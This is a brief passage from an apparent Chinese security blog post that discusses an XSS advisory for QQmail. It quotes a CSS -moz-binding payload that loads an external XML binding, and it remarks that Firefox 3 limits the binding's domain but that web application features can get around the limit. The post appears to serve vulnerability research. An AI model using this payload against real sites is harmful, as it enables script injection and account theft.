kxlzx:因为在http://hi.baidu.com/hi_heige/的留言被百度删除了,只好在这里发篇。
在http://www.80vul.com/qqmail/QQmail%20Multiple%20Xss%20Vulnerabilities.htm
看到,FF3对
<style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</style>
url中的域,是有限制的。
如果配合一些web应用的功能,可以绕过这个限制。
[……]